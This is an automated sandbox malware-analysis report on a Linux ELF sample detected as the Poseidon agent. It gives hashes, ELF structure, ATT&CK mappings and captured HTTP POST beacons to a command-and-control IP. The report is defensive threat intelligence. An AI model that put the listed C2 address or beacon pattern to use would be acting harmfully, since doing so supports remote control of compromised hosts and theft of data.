Linux Analysis Report
ulinux-logs.elf

Overview

General Information

Sample name:ulinux-logs.elf
Analysis ID:1645091
MD5:915d49a0a95eb7903709d871bb9a3dbe
SHA1:2032dc00c90c4d8bd0999dbb04d0645055cac29d
SHA256:0adfb26be5ddeefca5a2466946e7fbddd48920f71fadbd8976ee9c2ea22fc704
Tags:elf, user-JAMESWT_MHT
Infos:

Detection

Poseidon
Score:56
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Poseidon
Contains symbols related to standard C library sleeps (sometimes used to evade sandboxing)
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1645091
Start date and time:2025-03-21 13:01:20 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 11m 1s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:ulinux-logs.elf
Detection:MAL
Classification:mal56.troj.linELF@0/0@0/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • VT rate limit hit for: http://161.35.85.95/
  • VT rate limit hit for: http://161.35.85.95/data
  • VT rate limit hit for: http://161.35.85.95/data77bd446-2b3f-4d7c-beb1-343ec11e7427
  • VT rate limit hit for: http://161.35.85.95/dataget_delegate_tasks
  • VT rate limit hit for: http://161.35.85.95/datahttp://161.35.85.95/data
  • VT rate limit hit for: http://161.35.85.95/datahttp://161.35.85.95/dataPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/b
  • VT rate limit hit for: http://161.35.85.95/datamax-age=0
Command:/tmp/ulinux-logs.elf
PID:6223
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • ulinux-logs.elf (PID: 6223, Parent: 6140, MD5: 915d49a0a95eb7903709d871bb9a3dbe) Arguments: /tmp/ulinux-logs.elf
  • cleanup
Source | Rule | Description | Author | Strings
ulinux-logs.elf | JoeSecurity_Poseidon | Yara detected Poseidon | Joe Security |
    No Suricata rule has matched

    AV Detection

    Source: ulinux-logs.elf | Virustotal: Detection: 33%
    Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknown | TCP traffic detected without corresponding DNS query: 161.35.85.95
    Source: unknown | TCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknown | TCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknown | HTTP traffic detected: POST /data HTTP/1.1 Host: 161.35.85.95 User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Content-Length: 1608 Accept-Encoding: gzip Connection: close
    Source: ulinux-logs.elf | ELF static info symbol of initial sample: freeaddrinfo
    Source: ulinux-logs.elf | ELF static info symbol of initial sample: gai_strerror
    Source: ulinux-logs.elf | ELF static info symbol of initial sample: getaddrinfo
    Source: ulinux-logs.elf | ELF static info symbol of initial sample: getnameinfo
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | String found in binary or memory: http://161.35.85.95/
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | String found in binary or memory: http://161.35.85.95/data
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | String found in binary or memory: http://161.35.85.95/data77bd446-2b3f-4d7c-beb1-343ec11e7427
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | String found in binary or memory: http://161.35.85.95/dataget_delegate_tasks
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | String found in binary or memory: http://161.35.85.95/datahttp://161.35.85.95/data
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | String found in binary or memory: http://161.35.85.95/datahttp://161.35.85.95/dataPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/b
    Source: ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | String found in binary or memory: http://161.35.85.95/datamax-age=0
    Source: unknown | Network traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 42836 -> 443
    Source: ELF static info symbol of initial sample | .symtab present: no
    Source: classification engine | Classification label: mal56.troj.linELF@0/0@0/0
    Source: ELF file section | Submission: ulinux-logs.elf
    Source: ELF symbol in initial sample | Symbol name: nanosleep
    Source: /tmp/ulinux-logs.elf (PID: 6223) | Queries kernel information via 'uname'

    Stealing of Sensitive Information

    Source: Yara match | File source: ulinux-logs.elf, type: SAMPLE

    Remote Access Functionality

    Source: Yara match | File source: ulinux-logs.elf, type: SAMPLE
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
    No configs have been found
    Behavior Graph ID: 1645091, Sample: ulinux-logs.elf, Startdate: 21/03/2025, Architecture: LINUX, Score: 56 (graph not reproduced; nodes: ulinux-logs.elf started; 109.202.202.202, 80, INIT7CH, Switzerland; 161.35.85.95, 52630, 52632, 52634, DIGITALOCEAN-ASNUS, United States; 2 other IPs or domains; signatures: Multi AV Scanner detection for submitted file, Yara detected Poseidon)

    Source | Detection | Scanner | Label
    ulinux-logs.elf | 34% | Virustotal |
    No Antivirus matches

    No contacted domains info

    Name | Malicious | Antivirus Detection | Reputation
    http://161.35.85.95/data | false | | unknown

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://161.35.85.95/datahttp://161.35.85.95/data | ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | false | | unknown
    http://161.35.85.95/datahttp://161.35.85.95/dataPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/b | ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | false | | unknown
    http://161.35.85.95/dataget_delegate_tasks | ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | false | | unknown
    http://161.35.85.95/ | ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | false | | unknown
    http://161.35.85.95/datamax-age=0 | ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | false | | unknown
    http://161.35.85.95/data77bd446-2b3f-4d7c-beb1-343ec11e7427 | ulinux-logs.elf, 6223.1.000000c000000000.000000c000800000.rw-.sdmp | false | | unknown

    IP | Domain | Country | ASN | ASN Name | Malicious
    109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false
    91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false
    91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false
    161.35.85.95 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false

    No created / dropped files found

    File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ac7dad0c08e69c2e45ed9dfb9d9b54f1cb19e9fc, for GNU/Linux 3.2.0, stripped
    Entropy (8bit):6.20283147917405
    TrID:
    • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
    • ELF Executable and Linkable format (generic) (4004/1) 49.46%
    • Lumena CEL bitmap (63/63) 0.78%
    File name:ulinux-logs.elf
    File size:8'158'184 bytes
    MD5:915d49a0a95eb7903709d871bb9a3dbe
    SHA1:2032dc00c90c4d8bd0999dbb04d0645055cac29d
    SHA256:0adfb26be5ddeefca5a2466946e7fbddd48920f71fadbd8976ee9c2ea22fc704
    SHA512:2c479b210004df72bb74ae0319bd9e96144c1ae2d3968eb49c1b1da9456e78cc607185020f7dc42d502c9103acae1e5f1c342d173aa9efcc8343eb0628412053
    SSDEEP:49152:SUZYhGZ9/HqXv9stcmRJxSZeRSGZRFSET0qBiPpFNyMFRD/5EEHlchbKflKtMMF7:SnKE9Xm7RSARBLMFRDREMctLme
    TLSH:F7864943ECA545E8C1ADD2348A669263BA717C494F3063D32B50F7782F77BD0AAB9344
    ELF header

    Class:ELF64
    Data:2's complement, little endian
    Version:1 (current)
    Machine:Advanced Micro Devices X86-64
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x4023f0
    Flags:0x0
    ELF Header Size:64
    Program Header Offset:64
    Program Header Size:56
    Number of Program Headers:12
    Section Header Offset:8156008
    Section Header Size:64
    Number of Section Headers:34
    Header String Table Index:33
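
    Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
     | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
    .interp | PROGBITS | 0x4002e0 | 0x2e0 | 0x1c | 0x0 | 0x2 | A | 0 | 0 | 1
    .note.gnu.build-id | NOTE | 0x4002fc | 0x2fc | 0x24 | 0x0 | 0x2 | A | 0 | 0 | 4
    .note.ABI-tag | NOTE | 0x400320 | 0x320 | 0x20 | 0x0 | 0x2 | A | 0 | 0 | 4
    .gnu.hash | GNU_HASH | 0x400340 | 0x340 | 0x34 | 0x0 | 0x2 | A | 5 | 0 | 8
    .dynsym | DYNSYM | 0x400378 | 0x378 | 0x630 | 0x18 | 0x2 | A | 6 | 1 | 8
    .dynstr | STRTAB | 0x4009a8 | 0x9a8 | 0x330 | 0x0 | 0x2 | A | 0 | 0 | 1
    .gnu.version | VERSYM | 0x400cd8 | 0xcd8 | 0x84 | 0x2 | 0x2 | A | 5 | 0 | 2
    .gnu.version_r | VERNEED | 0x400d60 | 0xd60 | 0x70 | 0x0 | 0x2 | A | 6 | 3 | 8
    .rela.dyn | RELA | 0x400dd0 | 0xdd0 | 0x48 | 0x18 | 0x2 | A | 5 | 0 | 8
    .rela.plt | RELA | 0x400e18 | 0xe18 | 0x570 | 0x18 | 0x42 | AI | 5 | 26 | 8
    .init | PROGBITS | 0x402000 | 0x2000 | 0x17 | 0x0 | 0x6 | AX | 0 | 0 | 4
    .plt | PROGBITS | 0x402020 | 0x2020 | 0x3b0 | 0x10 | 0x6 | AX | 0 | 0 | 16
    .text | PROGBITS | 0x4023e0 | 0x23e0 | 0x3b98c1 | 0x0 | 0x6 | AX | 0 | 0 | 32
    .fini | PROGBITS | 0x7bbca4 | 0x3bbca4 | 0x9 | 0x0 | 0x6 | AX | 0 | 0 | 4
    .rodata | PROGBITS | 0x7bc000 | 0x3bc000 | 0x1896b0 | 0x0 | 0x2 | A | 0 | 0 | 32
    .typelink | PROGBITS | 0x9456c0 | 0x5456c0 | 0x2848 | 0x0 | 0x2 | A | 0 | 0 | 32
    .itablink | PROGBITS | 0x947f20 | 0x547f20 | 0xee0 | 0x0 | 0x2 | A | 0 | 0 | 32
    .gopclntab | PROGBITS | 0x948e00 | 0x548e00 | 0x238300 | 0x0 | 0x2 | A | 0 | 0 | 32
    .eh_frame_hdr | PROGBITS | 0xb81100 | 0x781100 | 0x1c4 | 0x0 | 0x2 | A | 0 | 0 | 4
    .eh_frame | PROGBITS | 0xb812c8 | 0x7812c8 | 0x8d8 | 0x0 | 0x2 | A | 0 | 0 | 8
    .tbss | NOBITS | 0xb82de8 | 0x781de8 | 0x8 | 0x0 | 0x403 | WAT | 0 | 0 | 8
    .init_array | INIT_ARRAY | 0xb82de8 | 0x781de8 | 0x8 | 0x8 | 0x3 | WA | 0 | 0 | 8
    .fini_array | FINI_ARRAY | 0xb82df0 | 0x781df0 | 0x8 | 0x8 | 0x3 | WA | 0 | 0 | 8
    .dynamic | DYNAMIC | 0xb82df8 | 0x781df8 | 0x1f0 | 0x10 | 0x3 | WA | 6 | 0 | 8
    .got | PROGBITS | 0xb82fe8 | 0x781fe8 | 0x18 | 0x8 | 0x3 | WA | 0 | 0 | 8
    .got.plt | PROGBITS | 0xb83000 | 0x782000 | 0x1e8 | 0x8 | 0x3 | WA | 0 | 0 | 8
    .data | PROGBITS | 0xb83200 | 0x782200 | 0x121f0 | 0x0 | 0x3 | WA | 0 | 0 | 32
    .go.buildinfo | PROGBITS | 0xb953f0 | 0x7943f0 | 0xbf0 | 0x0 | 0x3 | WA | 0 | 0 | 16
    .noptrdata | PROGBITS | 0xb95fe0 | 0x794fe0 | 0x32222 | 0x0 | 0x3 | WA | 0 | 0 | 32
    .bss | NOBITS | 0xbc8220 | 0x7c7202 | 0x22b40 | 0x0 | 0x3 | WA | 0 | 0 | 32
    .noptrbss | NOBITS | 0xbead60 | 0x7c7202 | 0xe1b0 | 0x0 | 0x3 | WA | 0 | 0 | 32
    .comment | PROGBITS | 0x0 | 0x7c7202 | 0x27 | 0x1 | 0x30 | MS | 0 | 0 | 1
    .shstrtab | STRTAB | 0x0 | 0x7c7229 | 0x13b | 0x0 | 0x0 | | 0 | 0 | 1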

    Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
    PHDR | 0x40 | 0x400040 | 0x400040 | 0x2a0 | 0x2a0 | 2.0364 | 0x4 | R | 0x8 | |
    INTERP | 0x2e0 | 0x4002e0 | 0x4002e0 | 0x1c | 0x1c | 3.9408 | 0x4 | R | 0x1 | /lib64/ld-linux-x86-64.so.2 | .interp
    LOAD | 0x0 | 0x400000 | 0x400000 | 0x1388 | 0x1388 | 2.8913 | 0x4 | R | 0x1000 | | .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt
    LOAD | 0x2000 | 0x402000 | 0x402000 | 0x3b9cad | 0x3b9cad | 6.1682 | 0x5 | R E | 0x1000 | | .init .plt .text .fini
    LOAD | 0x3bc000 | 0x7bc000 | 0x7bc000 | 0x3c5ba0 | 0x3c5ba0 | 5.6687 | 0x4 | R | 0x1000 | | .rodata .typelink .itablink .gopclntab .eh_frame_hdr .eh_frame
    LOAD | 0x781de8 | 0xb82de8 | 0xb82de8 | 0x4541a | 0x76128 | 5.0823 | 0x6 | RW | 0x1000 | | .tbss .init_array .fini_array .dynamic .got .got.plt .data .go.buildinfo .noptrdata .bss .noptrbss
    DYNAMIC | 0x781df8 | 0xb82df8 | 0xb82df8 | 0x1f0 | 0x1f0 | 1.5787 | 0x6 | RW | 0x8 | | .dynamic
    NOTE | 0x2fc | 0x4002fc | 0x4002fc | 0x44 | 0x44 | 3.3673 | 0x4 | R | 0x4 | | .note.gnu.build-id .note.ABI-tag
    TLS | 0x781de8 | 0xb82de8 | 0xb82de8 | 0x0 | 0x8 | 0.0000 | 0x4 | R | 0x8 | | .tbss
    GNU_EH_FRAME | 0x781100 | 0xb81100 | 0xb81100 | 0x1c4 | 0x1c4 | 4.5839 | 0x4 | R | 0x4 | | .eh_frame_hdr
    GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x10 | |
    GNU_RELRO | 0x781de8 | 0xb82de8 | 0xb82de8 | 0x218 | 0x218 | 1.5704 | 0x4 | R | 0x1 | | .tbss .init_array .fini_array .dynamic .got
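| Type | Meta | Value | Tag |
|---|---|---|---|
| DT_NEEDED | sharedlib | libpthread.so.0 | 0x1 |
| DT_NEEDED | sharedlib | libresolv.so.2 | 0x1 |
| DT_NEEDED | sharedlib | libc.so.6 | 0x1 |
| DT_INIT | value | 0x402000 | 0xc |
| DT_FINI | value | 0x7bbca4 | 0xd |
| DT_INIT_ARRAY | value | 0xb82de8 | 0x19 |
| DT_INIT_ARRAYSZ | bytes | 8 | 0x1b |
| DT_FINI_ARRAY | value | 0xb82df0 | 0x1a |
| DT_FINI_ARRAYSZ | bytes | 8 | 0x1c |
| DT_GNU_HASH | value | 0x400340 | 0x6ffffef5 |
| DT_STRTAB | value | 0x4009a8 | 0x5 |
| DT_SYMTAB | value | 0x400378 | 0x6 |
| DT_STRSZ | bytes | 816 | 0xa |
| DT_SYMENT | bytes | 24 | 0xb |
| DT_DEBUG | value | 0x0 | 0x15 |
| DT_PLTGOT | value | 0xb83000 | 0x3 |
| DT_PLTRELSZ | bytes | 1392 | 0x2 |
| DT_PLTREL | pltrel | DT_RELA | 0x14 |
| DT_JMPREL | value | 0x400e18 | 0x17 |
| DT_RELA | value | 0x400dd0 | 0x7 |
| DT_RELASZ | bytes | 72 | 0x8 |
| DT_RELAENT | bytes | 24 | 0x9 |
| DT_VERNEED | value | 0x400d60 | 0x6ffffffe |
| DT_VERNEEDNUM | value | 3 | 0x6fffffff |
| DT_VERSYM | value | 0x400cd8 | 0x6ffffff0 |
| DT_NULL | value | 0x0 | 0x0 |
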
| Name | Version Info Name | Version Info File Name | Section Name | Value | Size | Symbol Type | Symbol Bind | Symbol Visibility | Ndx |
|---|---|---|---|---|---|---|---|---|---|
| | | | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF |
| RunMain | | | .dynsym | 0x7bac20 | 60 | FUNC | <unknown> | DEFAULT | 13 |
| __errno_location | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| __gmon_start__ | | | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF |
| __libc_start_main | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| __res_search | GLIBC_2.2.5 | libresolv.so.2 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| _cgo_panic | | | .dynsym | 0x48c3e0 | 45 | FUNC | <unknown> | DEFAULT | 13 |
| _cgo_topofstack | | | .dynsym | 0x476120 | 25 | FUNC | <unknown> | DEFAULT | 13 |
| abort | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| crosscall2 | | | .dynsym | 0x48c460 | 104 | FUNC | <unknown> | DEFAULT | 13 |
| fprintf | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| fputc | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| free | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| freeaddrinfo | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| fwrite | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| gai_strerror | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| getaddrinfo | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| getegid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| geteuid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| getgid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| getgrgid_r | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| getgrnam_r | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| getgrouplist | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| getnameinfo | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| getpwnam_r | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| getpwuid_r | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| getuid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| malloc | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| mmap | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| munmap | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| nanosleep | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_attr_destroy | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_attr_getstack | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_attr_getstacksize | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_attr_init | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_cond_broadcast | GLIBC_2.3.2 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_cond_wait | GLIBC_2.3.2 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_create | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_detach | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_getattr_np | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_key_create | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_mutex_lock | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_mutex_unlock | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_self | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_setspecific | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| pthread_sigmask | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| setegid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| setenv | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| seteuid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| setgid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| setgroups | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| setregid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| setresgid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| setresuid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| setreuid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| setuid | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| sigaction | GLIBC_2.2.5 | libpthread.so.0 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| sigaddset | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| sigemptyset | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| sigfillset | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| sigismember | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| stderr | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | OBJECT | <unknown> | DEFAULT | SHN_UNDEF |
| strerror | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| sysconf | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| unsetenv | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| vfprintf | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |


                                                          • Total Packets: 37
                                                          • 443 (HTTPS)
                                                          • 80 (HTTP)
                                                          • 161.35.85.95
| Session ID | Source IP | Source Port | Destination IP | Destination Port |
|---|---|---|---|---|
| 0 | 192.168.2.23 | 52630 | 161.35.85.95 | 80 |

Timestamp: Mar 21, 2025 13:02:03.401070118 CET | Bytes transferred: 1802 | Direction: OUT | Data:
POST /data HTTP/1.1
Host: 161.35.85.95
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Content-Length: 1608
Accept-Encoding: gzip
Connection: close

Timestamp: Mar 21, 2025 13:02:03.569777012 CET | Bytes transferred: 288 | Direction: IN | Data:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache
Content-Type: application/javascript; charset=utf-8
Content-Type: application/octet-stream
Date: Fri, 21 Mar 2025 12:02:03 GMT
Pragma: no-cache
Server: NetDNA-cache/2.2
Connection: close
Transfer-Encoding: chunked


| Session ID | Source IP | Source Port | Destination IP | Destination Port |
|---|---|---|---|---|
| 1 | 192.168.2.23 | 52632 | 161.35.85.95 | 80 |

Timestamp: Mar 21, 2025 13:02:03.746699095 CET | Bytes transferred: 969 | Direction: OUT | Data:
POST /data HTTP/1.1
Host: 161.35.85.95
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Content-Length: 776
Accept-Encoding: gzip
Connection: close

Timestamp: Mar 21, 2025 13:02:04.189512968 CET | Bytes transferred: 521 | Direction: IN | Data:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache
Content-Length: 240
Content-Type: application/javascript; charset=utf-8
Content-Type: application/octet-stream
Date: Fri, 21 Mar 2025 12:02:04 GMT
Pragma: no-cache
Server: NetDNA-cache/2.2
Connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port |
|---|---|---|---|---|
| 2 | 192.168.2.23 | 52634 | 161.35.85.95 | 80 |

Timestamp: Mar 21, 2025 13:02:04.360285044 CET | Bytes transferred: 413 | Direction: OUT | Data:
POST /data HTTP/1.1
Host: 161.35.85.95
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Content-Length: 220
Accept-Encoding: gzip
Connection: close

Timestamp: Mar 21, 2025 13:02:04.529566050 CET | Bytes transferred: 457 | Direction: IN | Data:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache
Content-Length: 176
Content-Type: application/javascript; charset=utf-8
Content-Type: application/octet-stream
